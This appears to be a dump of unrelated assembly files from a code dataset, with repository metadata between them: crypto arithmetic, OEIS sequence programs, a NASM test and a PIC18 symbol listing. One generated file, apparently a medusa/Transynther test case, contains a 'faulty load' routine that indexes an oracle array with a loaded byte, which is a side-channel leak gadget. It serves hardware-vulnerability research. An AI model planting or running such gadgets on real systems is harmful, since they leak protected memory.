mov rdx, r8; 0xffffffffffffffff to rdx
mulx r15, r8, r15; x181, x180<- x178 * 0xffffffffffffffff
adox r10, rcx
add r12b, 0xFF; load flag from rm/8 into CF, clears other flag. NODE, if operand1 is not a byte reg, this fails.
setc r12b; since that has deps, resore it whereever it was
adcx rax, rdi
movzx r12, byte [ rsp + 0xd8 ]; load byte memx191 to register64
mov rdi, -0x1 ; moving imm to reg
adox r12, rdi; loading flag
adox r8, [ rsp + 0xd0 ]
adcx r10, r9
setc r12b; spill CF x177 to reg (r12)
movzx r9, byte [ rsp + 0xc8 ]; load byte memx200 to register64
clc;
adcx r9, rdi; loading flag
adcx rax, r8
adox r15, rcx
adcx r15, r10
movzx r9, r12b; x205, copying x177 here, cause x177 is needed in a reg for other than x205, namely all: , x205, size: 1
adc r9, 0x0
movzx r8, bl; x209, copying x209 here, cause x209 is needed in a reg for other than x209, namely all: , x210--x211, size: 1
add r8, -0x1
mov rbx, rax; x210, copying x201 here, cause x201 is needed in a reg for other than x210, namely all: , x218, x210--x211, size: 2
sbb rbx, rdx
mov r8, r15; x212, copying x203 here, cause x203 is needed in a reg for other than x212, namely all: , x219, x212--x213, size: 2
sbb r8, rdx
sbb r9, 0x00000000
cmovc r14, r13; if CF, x217<- x199 (nzVar)
mov r9, [ rsp + 0xb8 ]; x216, copying x206 here, cause x206 is needed in a reg for other than x216, namely all: , x216, size: 1
cmovc r9, rbp; if CF, x216<- x197 (nzVar)
mov rbp, [ rsp + 0x0 ]; load m64 out1 to register64
mov [ rbp + 0x8 ], r14; out1[1] = x217
cmovc r8, r15; if CF, x219<- x203 (nzVar)
cmovc rbx, rax; if CF, x218<- x201 (nzVar)
mov [ rbp + 0x18 ], r8; out1[3] = x219
mov [ rbp + 0x0 ], r9; out1[0] = x216
mov [ rbp + 0x10 ], rbx; out1[2] = x218
mov rbx, [ rsp + 0xe0 ]; restoring from stack
mov rbp, [ rsp + 0xe8 ]; restoring from stack
mov r12, [ rsp + 0xf0 ]; restoring from stack
mov r13, [ rsp + 0xf8 ]; restoring from stack
mov r14, [ rsp + 0x100 ]; restoring from stack
mov r15, [ rsp + 0x108 ]; restoring from stack
add rsp, 0x110
ret
; cpu Intel(R) Core(TM) i7-10710U CPU @ 1.10GHz
; clocked at 1600 MHz
; first cyclecount 56.935, best 51.163636363636364, lastGood 53.015625
; seed 2312492709004220
; CC / CFLAGS clang / -march=native -mtune=native -O3
; time needed: 1388511 ms / 60000 runs=> 23.14185ms/run
; Time spent for assembling and measureing (initial batch_size=160, initial num_batches=101): 316103 ms
; Ratio (time for assembling + measure)/(total runtime for 60000runs): 0.2276561006718708
; number reverted permutation/ tried permutation: 26814 / 30149 =88.938%
; number reverted decision/ tried decision: 22824 / 29852 =76.457%
| 40.515581
| 168
| 0.69256
|
6d5473d25fee6afe962d0b128eb684d371d6e698
| 351
|
asm
|
Assembly
|
programs/oeis/096/A096603.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 22
|
2018-02-06T19:19:31.000Z
|
2022-01-17T21:53:31.000Z
|
programs/oeis/096/A096603.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 41
|
2021-02-22T19:00:34.000Z
|
2021-08-28T10:47:47.000Z
|
programs/oeis/096/A096603.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 5
|
2021-02-24T21:14:16.000Z
|
2021-08-09T19:48:05.000Z
|
; A096603: Numbers occurring twice in A096607.
; 1,2,4,5,8,9,11,13,16,17,19,21,23,25,27,29,32,33,35,37,39,41,43,45,47,49,51,53,55,57,59,61,64,65,67,69,71,73,75,77,79,81,83,85,87,89,91,93,95,97,99,101,103,105,107,109,111,113,115,117,119,121,123,125,128,129
mul $0,2
mov $2,$0
lpb $0
sub $0,1
div $0,2
add $1,$2
div $1,2
lpe
add $1,1
mov $0,$1
| 25.071429
| 208
| 0.641026
|
2a84887338f1d1f73e9a2e1bfca8f8d3375a1165
| 1,250
|
asm
|
Assembly
|
Transynther/x86/_processed/US/_zr_/i3-7100_9_0xca_notsx.log_194_874.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 9
|
2020-08-13T19:41:58.000Z
|
2022-03-30T12:22:51.000Z
|
Transynther/x86/_processed/US/_zr_/i3-7100_9_0xca_notsx.log_194_874.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 1
|
2021-04-29T06:29:35.000Z
|
2021-05-13T21:02:30.000Z
|
Transynther/x86/_processed/US/_zr_/i3-7100_9_0xca_notsx.log_194_874.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 3
|
2020-07-14T17:07:07.000Z
|
2022-03-21T01:12:22.000Z
|
.global s_prepare_buffers
s_prepare_buffers:
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r14
push %r9
push %rcx
push %rdx
// Faulty Load
lea addresses_US+0x2c77, %r14
nop
nop
nop
nop
inc %r11
mov (%r14), %dx
lea oracles, %rcx
and $0xff, %rdx
shlq $12, %rdx
mov (%rcx,%rdx,1), %rdx
pop %rdx
pop %rcx
pop %r9
pop %r14
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'src': {'same': False, 'congruent': 0, 'NT': True, 'type': 'addresses_US', 'size': 4, 'AVXalign': False}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_US', 'size': 2, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'00': 194}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
| 29.761905
| 581
| 0.6568
|
37ca9df3a43c11585f84bb9cbcaa8f560fec4902
| 445
|
asm
|
Assembly
|
programs/oeis/025/A025894.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 22
|
2018-02-06T19:19:31.000Z
|
2022-01-17T21:53:31.000Z
|
programs/oeis/025/A025894.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 41
|
2021-02-22T19:00:34.000Z
|
2021-08-28T10:47:47.000Z
|
programs/oeis/025/A025894.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 5
|
2021-02-24T21:14:16.000Z
|
2021-08-09T19:48:05.000Z
|
; A025894: Expansion of 1/((1-x^5)(1-x^10)(1-x^11)).
; 1,0,0,0,0,1,0,0,0,0,2,1,0,0,0,2,1,0,0,0,3,2,1,0,0,3,2,1,0,0,4,3,2,1,0,4,3,2,1,0,5,4,3,2,1,5,4,3,2,1,6,5,4,3,2,7,5,4,3,2,8,6,5,4,3,9,7,5,4,3,10,8,6,5,4,11,9,7,5,4
mov $3,$0
mov $5,2
lpb $5
mov $0,$3
sub $5,1
add $0,$5
trn $0,1
seq $0,29103 ; Expansion of 1/((1-x)(1-x^5)(1-x^10)(1-x^11)).
mov $2,$5
mul $2,$0
add $1,$2
mov $4,$0
lpe
min $3,1
mul $3,$4
sub $1,$3
mov $0,$1
| 21.190476
| 163
| 0.501124
|
55ea06921922e0cd06e91e1fd1a7c1b74f77706b
| 2,016
|
asm
|
Assembly
|
programs/oeis/147/A147656.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | 1
|
2021-03-15T11:38:20.000Z
|
2021-03-15T11:38:20.000Z
|
programs/oeis/147/A147656.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
programs/oeis/147/A147656.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
; A147656: The arithmetic mean of the n-th and (n+1)-st cubes, rounded down.
; 0,4,17,45,94,170,279,427,620,864,1165,1529,1962,2470,3059,3735,4504,5372,6345,7429,8630,9954,11407,12995,14724,16600,18629,20817,23170,25694,28395,31279,34352,37620,41089,44765,48654,52762,57095,61659,66460,71504,76797,82345,88154,94230,100579,107207,114120,121324,128825,136629,144742,153170,161919,170995,180404,190152,200245,210689,221490,232654,244187,256095,268384,281060,294129,307597,321470,335754,350455,365579,381132,397120,413549,430425,447754,465542,483795,502519,521720,541404,561577,582245,603414,625090,647279,669987,693220,716984,741285,766129,791522,817470,843979,871055,898704,926932,955745,985149,1015150,1045754,1076967,1108795,1141244,1174320,1208029,1242377,1277370,1313014,1349315,1386279,1423912,1462220,1501209,1540885,1581254,1622322,1664095,1706579,1749780,1793704,1838357,1883745,1929874,1976750,2024379,2072767,2121920,2171844,2222545,2274029,2326302,2379370,2433239,2487915,2543404,2599712,2656845,2714809,2773610,2833254,2893747,2955095,3017304,3080380,3144329,3209157,3274870,3341474,3408975,3477379,3546692,3616920,3688069,3760145,3833154,3907102,3981995,4057839,4134640,4212404,4291137,4370845,4451534,4533210,4615879,4699547,4784220,4869904,4956605,5044329,5133082,5222870,5313699,5405575,5498504,5592492,5687545,5783669,5880870,5979154,6078527,6178995,6280564,6383240,6487029,6591937,6697970,6805134,6913435,7022879,7133472,7245220,7358129,7472205,7587454,7703882,7821495,7940299,8060300,8181504,8303917,8427545,8552394,8678470,8805779,8934327,9064120,9195164,9327465,9461029,9595862,9731970,9869359,10008035,10148004,10289272,10431845,10575729,10720930,10867454,11015307,11164495,11315024,11466900,11620129,11774717,11930670,12087994,12246695,12406779,12568252,12731120,12895389,13061065,13228154,13396662,13566595,13737959,13910760,14085004,14260697,14437845,14616454,14796530,14978079,15161107,15345620,15531624
mul $0,2
add $0,1
mov $2,$0
add $2,$0
pow $0,2
add $0,3
mul $0,$2
mov $1,$0
div $1,16
| 155.076923
| 1,851
| 0.84375
|
0b14b44237c6a32339dc3d8b87b2fc3abaa87fd3
| 312
|
asm
|
Assembly
|
test/test.String.createz.asm
|
richRemer/atlatl
|
169c0c9c29d277dc1295e6c37b0963af6e02741a
|
[
"MIT"
] | null | null | null |
test/test.String.createz.asm
|
richRemer/atlatl
|
169c0c9c29d277dc1295e6c37b0963af6e02741a
|
[
"MIT"
] | null | null | null |
test/test.String.createz.asm
|
richRemer/atlatl
|
169c0c9c29d277dc1295e6c37b0963af6e02741a
|
[
"MIT"
] | null | null | null |
global test_case
extern String.createz
extern std.outsln
%include "String.inc"
section .text
test_case:
mov rax, test_zstr ; create arg
call String.createz ; create new String
call std.outsln ; print String
ret
section .data
test_zstr: db "Bar", 0x0
junk_data: db "junk"
| 17.333333
| 47
| 0.676282
|
d8d937fdc74cfa50b88e86059a894779891ebf8f
| 592
|
asm
|
Assembly
|
programs/oeis/073/A073757.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 22
|
2018-02-06T19:19:31.000Z
|
2022-01-17T21:53:31.000Z
|
programs/oeis/073/A073757.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 41
|
2021-02-22T19:00:34.000Z
|
2021-08-28T10:47:47.000Z
|
programs/oeis/073/A073757.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 5
|
2021-02-24T21:14:16.000Z
|
2021-08-09T19:48:05.000Z
|
; A073757: Number of numbers "related" to n: either divisors or terms in RRS of n.
; 1,2,3,4,5,5,7,7,8,7,11,9,13,9,11,12,17,11,19,13,15,13,23,15,22,15,21,17,29,15,31,21,23,19,27,20,37,21,27,23,41,19,43,25,29,25,47,25,44,25,35,29,53,25,43,31,39,31,59,27,61,33,41,38,51,27,67,37,47,31,71,35,73,39,45,41,63,31,79,41,58,43,83,35,67,45,59,47,89,35,75,49,63,49,75,43,97,47,65,48
mov $1,$0
seq $0,10 ; Euler totient function phi(n): count numbers <= n and prime to n.
seq $1,5 ; d(n) (also called tau(n) or sigma_0(n)), the number of divisors of n.
sub $0,$1
add $2,$1
add $2,$1
add $0,$2
sub $0,1
| 49.333333
| 289
| 0.652027
|
6e1d93ae0cba50d56492bb796ed36e7f2611dd95
| 1,261
|
asm
|
Assembly
|
Appl/Bindery/Main/mainManager.asm
|
steakknife/pcgeos
|
95edd7fad36df400aba9bab1d56e154fc126044a
|
[
"Apache-2.0"
] | 504
|
2018-11-18T03:35:53.000Z
|
2022-03-29T01:02:51.000Z
|
Appl/Bindery/Main/mainManager.asm
|
steakknife/pcgeos
|
95edd7fad36df400aba9bab1d56e154fc126044a
|
[
"Apache-2.0"
] | 96
|
2018-11-19T21:06:50.000Z
|
2022-03-06T10:26:48.000Z
|
Appl/Bindery/Main/mainManager.asm
|
steakknife/pcgeos
|
95edd7fad36df400aba9bab1d56e154fc126044a
|
[
"Apache-2.0"
] | 73
|
2018-11-19T20:46:53.000Z
|
2022-03-29T00:59:26.000Z
|
COMMENT @----------------------------------------------------------------------
Copyright (c) Geoworks 1992-1994 -- All Rights Reserved
PROJECT: GEOS
MODULE: Studio
FILE: Main/mainManager.asm
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 2/92 Initial version
DESCRIPTION:
This file contains the process class for the Studio application.
$Id: mainManager.asm,v 1.1 97/04/04 14:39:41 newdeal Exp $
------------------------------------------------------------------------------@
;------------------------------------------------------------------------------
; Common GEODE stuff
;------------------------------------------------------------------------------
include studioGeode.def
include studioConstant.def
include studioProcess.def
include studioDocument.def
include studioApplication.def
include flowRegion.def
include initfile.def
include timedate.def ; TimerGetDateAndTime
include Objects/Text/tCtrlC.def
include studioControl.def
;------------------------------------------------------------------------------
; Code
;------------------------------------------------------------------------------
include mainProcess.asm
include mainApp.asm
include mainAppUI.asm
| 28.022222
| 80
| 0.457573
|
246b5ee967de48fb47ec73b6dd627a54d6a80caf
| 260
|
asm
|
Assembly
|
libsrc/_DEVELOPMENT/z80/c/sccz80/z80_indr.asm
|
jpoikela/z88dk
|
7108b2d7e3a98a77de99b30c9a7c9199da9c75cb
|
[
"ClArtistic"
] | 640
|
2017-01-14T23:33:45.000Z
|
2022-03-30T11:28:42.000Z
|
libsrc/_DEVELOPMENT/z80/c/sccz80/z80_indr.asm
|
jpoikela/z88dk
|
7108b2d7e3a98a77de99b30c9a7c9199da9c75cb
|
[
"ClArtistic"
] | 1,600
|
2017-01-15T16:12:02.000Z
|
2022-03-31T12:11:12.000Z
|
libsrc/_DEVELOPMENT/z80/c/sccz80/z80_indr.asm
|
jpoikela/z88dk
|
7108b2d7e3a98a77de99b30c9a7c9199da9c75cb
|
[
"ClArtistic"
] | 215
|
2017-01-17T10:43:03.000Z
|
2022-03-23T17:25:02.000Z
|
; void *z80_indr(void *dst, uint8_t port, uint8_t num)
SECTION code_clib
SECTION code_z80
PUBLIC z80_indr
EXTERN asm_z80_indr
z80_indr:
pop af
pop de
pop bc
pop hl
push hl
push bc
push de
push af
ld b,e
jp asm_z80_indr
| 10.4
| 54
| 0.665385
|
f395cf96c8e11b5c5bab5ec491f542672c0758b0
| 271
|
asm
|
Assembly
|
programs/oeis/004/A004380.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 22
|
2018-02-06T19:19:31.000Z
|
2022-01-17T21:53:31.000Z
|
programs/oeis/004/A004380.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 41
|
2021-02-22T19:00:34.000Z
|
2021-08-28T10:47:47.000Z
|
programs/oeis/004/A004380.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 5
|
2021-02-24T21:14:16.000Z
|
2021-08-09T19:48:05.000Z
|
; A004380: Binomial coefficient C(7n,n-12).
; 1,91,4753,187460,6210820,182637273,4925156775,124397910208,2985733783935,68805631064170,1534076755992935,33283806441690896,705873715441872264,14684612966748995725,300515354528763817950
mov $1,$0
add $0,12
mul $0,7
bin $0,$1
| 33.875
| 186
| 0.822878
|
a3ae7c83d80acea60869598b5ad95832240f6a25
| 92,651
|
asm
|
Assembly
|
Flowcode/DAQCard/Ver001.asm
|
skgadi/Programming
|
c89e635e85d2db0ef8850a80cf6cab94cadd5f7f
|
[
"MIT"
] | null | null | null |
Flowcode/DAQCard/Ver001.asm
|
skgadi/Programming
|
c89e635e85d2db0ef8850a80cf6cab94cadd5f7f
|
[
"MIT"
] | null | null | null |
Flowcode/DAQCard/Ver001.asm
|
skgadi/Programming
|
c89e635e85d2db0ef8850a80cf6cab94cadd5f7f
|
[
"MIT"
] | null | null | null |
;/////////////////////////////////////////////////////////////////////////////////
;// Code Generator: BoostC Compiler - http://www.sourceboost.com
;// Version : 7.20
;// License Type : Pro License
;// Limitations : PIC18 max code size:Unlimited, max RAM banks:Unlimited
;/////////////////////////////////////////////////////////////////////////////////
include "P18F14K50.inc"
__HEAPSTART EQU 0x000002AA ; Start address of heap
__HEAPEND EQU 0x000002FF ; End address of heap
memcpy8_00000_arg_dst EQU 0x0000026D ; bytes:2
memcpy8_00000_arg_src EQU 0x0000026F ; bytes:2
memcpy8_00000_arg_len EQU 0x00000271 ; bytes:1
CompTempVarRet410 EQU 0x00000276 ; bytes:2
memcpy8_00000_1_dst2 EQU 0x00000272 ; bytes:2
memcpy8_00000_1_src2 EQU 0x00000274 ; bytes:2
CompTempVar411 EQU 0x00000276 ; bytes:1
gbl_status EQU 0x00000FD8 ; bytes:1
gbl_prodl EQU 0x00000FF3 ; bytes:1
gbl_prodh EQU 0x00000FF4 ; bytes:1
gbl_14_LSR EQU 0x000000FC ; bytes:4
gbl_float_detect_tininess EQU 0x0000005F ; bytes:1
gbl_float_rounding_mode EQU 0x00000238 ; bytes:1
gbl_float_exception_flags EQU 0x00000239 ; bytes:1
gbl_15_gbl_aSig EQU 0x000001EE ; bytes:4
gbl_15_gbl_bSig EQU 0x000001F2 ; bytes:4
gbl_15_gbl_zSig EQU 0x000001F6 ; bytes:4
gbl_15_gbl_aExp EQU 0x0000023A ; bytes:1
gbl_15_gbl_bExp EQU 0x0000023B ; bytes:1
gbl_15_gbl_zExp EQU 0x000001FE ; bytes:2
gbl_15_gbl_aSign EQU 0x0000023C ; bytes:1
gbl_15_gbl_bSign EQU 0x0000023D ; bytes:1
gbl_15_gbl_zSign EQU 0x0000023E ; bytes:1
gbl_15_gbl_zSigZero EQU 0x0000023F ; bytes:1
gbl_15_gbl_ret EQU 0x000001FA ; bytes:4
gbl_uep0 EQU 0x00000F53 ; bytes:1
gbl_uep1 EQU 0x00000F54 ; bytes:1
gbl_uep2 EQU 0x00000F55 ; bytes:1
gbl_uep3 EQU 0x00000F56 ; bytes:1
gbl_uep4 EQU 0x00000F57 ; bytes:1
gbl_uep5 EQU 0x00000F58 ; bytes:1
gbl_uep6 EQU 0x00000F59 ; bytes:1
gbl_uep7 EQU 0x00000F5A ; bytes:1
gbl_ueie EQU 0x00000F5B ; bytes:1
gbl_uaddr EQU 0x00000F5C ; bytes:1
gbl_ufrml EQU 0x00000F5D ; bytes:1
gbl_ufrmh EQU 0x00000F5E ; bytes:1
gbl_ueir EQU 0x00000F5F ; bytes:1
gbl_uie EQU 0x00000F60 ; bytes:1
gbl_ucfg EQU 0x00000F61 ; bytes:1
gbl_uir EQU 0x00000F62 ; bytes:1
gbl_ustat EQU 0x00000F63 ; bytes:1
gbl_ucon EQU 0x00000F64 ; bytes:1
gbl_srcon0 EQU 0x00000F68 ; bytes:1
gbl_srcon1 EQU 0x00000F69 ; bytes:1
gbl_cm2con0 EQU 0x00000F6B ; bytes:1
gbl_cm2con1 EQU 0x00000F6C ; bytes:1
gbl_cm1con0 EQU 0x00000F6D ; bytes:1
gbl_sspmsk EQU 0x00000F6F ; bytes:1
gbl_slrcon EQU 0x00000F76 ; bytes:1
gbl_wpua EQU 0x00000F77 ; bytes:1
gbl_wpub EQU 0x00000F78 ; bytes:1
gbl_ioca EQU 0x00000F79 ; bytes:1
gbl_iocb EQU 0x00000F7A ; bytes:1
gbl_ansel EQU 0x00000F7E ; bytes:1
gbl_anselh EQU 0x00000F7F ; bytes:1
gbl_porta EQU 0x00000F80 ; bytes:1
gbl_portb EQU 0x00000F81 ; bytes:1
gbl_portc EQU 0x00000F82 ; bytes:1
gbl_lata EQU 0x00000F89 ; bytes:1
gbl_latb EQU 0x00000F8A ; bytes:1
gbl_latc EQU 0x00000F8B ; bytes:1
gbl_ddra EQU 0x00000F92 ; bytes:1
gbl_trisa EQU 0x00000F92 ; bytes:1
gbl_ddrb EQU 0x00000F93 ; bytes:1
gbl_trisb EQU 0x00000F93 ; bytes:1
gbl_ddrc EQU 0x00000F94 ; bytes:1
gbl_trisc EQU 0x00000F94 ; bytes:1
gbl_osctune EQU 0x00000F9B ; bytes:1
gbl_pie1 EQU 0x00000F9D ; bytes:1
gbl_pir1 EQU 0x00000F9E ; bytes:1
gbl_ipr1 EQU 0x00000F9F ; bytes:1
gbl_pie2 EQU 0x00000FA0 ; bytes:1
gbl_pir2 EQU 0x00000FA1 ; bytes:1
gbl_ipr2 EQU 0x00000FA2 ; bytes:1
gbl_eecon1 EQU 0x00000FA6 ; bytes:1
gbl_eecon2 EQU 0x00000FA7 ; bytes:1
gbl_eedata EQU 0x00000FA8 ; bytes:1
gbl_eeadr EQU 0x00000FA9 ; bytes:1
gbl_rcsta EQU 0x00000FAB ; bytes:1
gbl_txsta EQU 0x00000FAC ; bytes:1
gbl_txreg EQU 0x00000FAD ; bytes:1
gbl_rcreg EQU 0x00000FAE ; bytes:1
gbl_spbrg EQU 0x00000FAF ; bytes:1
gbl_spbrgh EQU 0x00000FB0 ; bytes:1
gbl_t3con EQU 0x00000FB1 ; bytes:1
gbl_tmr3l EQU 0x00000FB2 ; bytes:1
gbl_tmr3h EQU 0x00000FB3 ; bytes:1
gbl_eccp1as EQU 0x00000FB6 ; bytes:1
gbl_pwm1con EQU 0x00000FB7 ; bytes:1
gbl_baudcon EQU 0x00000FB8 ; bytes:1
gbl_baudctl EQU 0x00000FB8 ; bytes:1
gbl_pstrcon EQU 0x00000FB9 ; bytes:1
gbl_refcon0 EQU 0x00000FBA ; bytes:1
gbl_vrefcon0 EQU 0x00000FBA ; bytes:1
gbl_refcon1 EQU 0x00000FBB ; bytes:1
gbl_vrefcon1 EQU 0x00000FBB ; bytes:1
gbl_refcon2 EQU 0x00000FBC ; bytes:1
gbl_vrefcon2 EQU 0x00000FBC ; bytes:1
gbl_ccp1con EQU 0x00000FBD ; bytes:1
gbl_ccpr1 EQU 0x00000FBE ; bytes:1
gbl_ccpr1l EQU 0x00000FBE ; bytes:1
gbl_ccpr1h EQU 0x00000FBF ; bytes:1
gbl_adcon2 EQU 0x00000FC0 ; bytes:1
gbl_adcon1 EQU 0x00000FC1 ; bytes:1
gbl_adcon0 EQU 0x00000FC2 ; bytes:1
gbl_adres EQU 0x00000FC3 ; bytes:1
gbl_adresl EQU 0x00000FC3 ; bytes:1
gbl_adresh EQU 0x00000FC4 ; bytes:1
gbl_sspcon2 EQU 0x00000FC5 ; bytes:1
gbl_sspcon1 EQU 0x00000FC6 ; bytes:1
gbl_sspstat EQU 0x00000FC7 ; bytes:1
gbl_sspadd EQU 0x00000FC8 ; bytes:1
gbl_sspbuf EQU 0x00000FC9 ; bytes:1
gbl_t2con EQU 0x00000FCA ; bytes:1
gbl_pr2 EQU 0x00000FCB ; bytes:1
gbl_tmr2 EQU 0x00000FCC ; bytes:1
gbl_t1con EQU 0x00000FCD ; bytes:1
gbl_tmr1l EQU 0x00000FCE ; bytes:1
gbl_tmr1h EQU 0x00000FCF ; bytes:1
gbl_rcon EQU 0x00000FD0 ; bytes:1
gbl_wdtcon EQU 0x00000FD1 ; bytes:1
gbl_osccon2 EQU 0x00000FD2 ; bytes:1
gbl_osccon EQU 0x00000FD3 ; bytes:1
gbl_t0con EQU 0x00000FD5 ; bytes:1
gbl_tmr0l EQU 0x00000FD6 ; bytes:1
gbl_tmr0h EQU 0x00000FD7 ; bytes:1
gbl_fsr2l EQU 0x00000FD9 ; bytes:1
gbl_fsr2h EQU 0x00000FDA ; bytes:1
gbl_plusw2 EQU 0x00000FDB ; bytes:1
gbl_preinc2 EQU 0x00000FDC ; bytes:1
gbl_postdec2 EQU 0x00000FDD ; bytes:1
gbl_postinc2 EQU 0x00000FDE ; bytes:1
gbl_indf2 EQU 0x00000FDF ; bytes:1
gbl_bsr EQU 0x00000FE0 ; bytes:1
gbl_fsr1l EQU 0x00000FE1 ; bytes:1
gbl_fsr1h EQU 0x00000FE2 ; bytes:1
gbl_plusw1 EQU 0x00000FE3 ; bytes:1
gbl_preinc1 EQU 0x00000FE4 ; bytes:1
gbl_postdec1 EQU 0x00000FE5 ; bytes:1
gbl_postinc1 EQU 0x00000FE6 ; bytes:1
gbl_indf1 EQU 0x00000FE7 ; bytes:1
gbl_wreg EQU 0x00000FE8 ; bytes:1
gbl_fsr0l EQU 0x00000FE9 ; bytes:1
gbl_fsr0h EQU 0x00000FEA ; bytes:1
gbl_plusw0 EQU 0x00000FEB ; bytes:1
gbl_preinc0 EQU 0x00000FEC ; bytes:1
gbl_postdec0 EQU 0x00000FED ; bytes:1
gbl_postinc0 EQU 0x00000FEE ; bytes:1
gbl_indf0 EQU 0x00000FEF ; bytes:1
gbl_intcon3 EQU 0x00000FF0 ; bytes:1
gbl_intcon2 EQU 0x00000FF1 ; bytes:1
gbl_intcon EQU 0x00000FF2 ; bytes:1
gbl_prod EQU 0x00000FF3 ; bytes:1
gbl_tablat EQU 0x00000FF5 ; bytes:1
gbl_tblptr EQU 0x00000FF6 ; bytes:1
gbl_tblptrl EQU 0x00000FF6 ; bytes:1
gbl_tblptrh EQU 0x00000FF7 ; bytes:1
gbl_tblptru EQU 0x00000FF8 ; bytes:1
gbl_pc EQU 0x00000FF9 ; bytes:1
gbl_pcl EQU 0x00000FF9 ; bytes:1
gbl_pclath EQU 0x00000FFA ; bytes:1
gbl_pclatu EQU 0x00000FFB ; bytes:1
gbl_stkptr EQU 0x00000FFC ; bytes:1
gbl_tos EQU 0x00000FFD ; bytes:1
gbl_tosl EQU 0x00000FFD ; bytes:1
gbl_tosh EQU 0x00000FFE ; bytes:1
gbl_tosu EQU 0x00000FFF ; bytes:1
gbl_FCV_OPERATION EQU 0x00000240 ; bytes:1
gbl_FCV_READINPUT EQU 0x00000228 ; bytes:2
gbl_FCV_OUTSTRING EQU 0x0000022A ; bytes:2
gbl_FCV_0df41_PWM1__ENABLED EQU 0x00000241 ; bytes:1
gbl_MX_USBNAME EQU 0x0000016E ; bytes:40
gbl_MX_USBMFR EQU 0x00000140 ; bytes:46
gbl_MX_SERIAL EQU 0x000000E0 ; bytes:10
gbl_usb_state EQU 0x00000242 ; bytes:1
gbl_usb_address EQU 0x00000243 ; bytes:1
gbl_usb_sdp EQU 0x0000019F ; bytes:8
gbl_control_mode EQU 0x00000244 ; bytes:1
gbl_bd0out EQU 0x00000200 ; bytes:4
gbl_bd0in EQU 0x00000204 ; bytes:4
gbl_bd1out EQU 0x00000208 ; bytes:4
gbl_bd1in EQU 0x0000020C ; bytes:4
gbl_bd2out EQU 0x00000210 ; bytes:4
gbl_bd2in EQU 0x00000214 ; bytes:4
gbl_bd3out EQU 0x00000218 ; bytes:4
gbl_bd3in EQU 0x0000021C ; bytes:4
gbl_buffer_0_out EQU 0x00000280 ; bytes:8
gbl_buffer_0_in EQU 0x00000288 ; bytes:8
gbl_buffer_2_in EQU 0x00000290 ; bytes:8
gbl_buffer_3_in EQU 0x000002A0 ; bytes:8
gbl_buffer_3_out EQU 0x00000298 ; bytes:8
gbl_ep_in_buffer_location EQU 0x000001A7 ; bytes:8
gbl_ep_out_buffer_location EQU 0x000001AF ; bytes:8
gbl_ep_in_buffer_size EQU 0x000001B7 ; bytes:8
gbl_ep_out_buffer_size EQU 0x000001BF ; bytes:8
CompGblVar60 EQU 0x00000245 ; bytes:1
CompGblVar61 EQU 0x00000246 ; bytes:1
CompGblVar62 EQU 0x00000247 ; bytes:1
CompGblVar63 EQU 0x00000248 ; bytes:1
CompGblVar64 EQU 0x00000249 ; bytes:1
gbl_delivery_bytes_to_send EQU 0x0000022C ; bytes:2
gbl_delivery_bytes_max_send EQU 0x0000022E ; bytes:2
gbl_delivery_bytes_sent EQU 0x00000230 ; bytes:2
gbl_delivery_ptr EQU 0x00000232 ; bytes:2
gbl_delivery_buffer_size EQU 0x0000024A ; bytes:1
gbl_delivery_buffer EQU 0x00000234 ; bytes:2
gbl_usb_status EQU 0x0000024B ; bytes:1
gbl_buffer_byte EQU 0x0000024C ; bytes:1
gbl_cdc_tx_buffer EQU 0x00000060 ; bytes:64
